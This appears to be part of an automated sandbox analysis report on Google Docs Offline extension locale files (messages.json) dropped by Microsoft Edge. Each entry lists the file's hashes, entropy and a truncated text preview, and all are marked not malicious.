                                                                                                                                                                                                                                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):899
                                                                                                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\kk\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\km\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\kn\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ko\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\lo\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\lt\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\lv\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):994
                                                                                                                                                                                                                                                Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
                                                                                                                                                                                                                                                MD5:A568A58817375590007D1B8ABCAEBF82
                                                                                                                                                                                                                                                SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                                                                                                                                                                                                                SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                                                                                                                                                                                                                SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ml\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2091
                                                                                                                                                                                                                                                Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
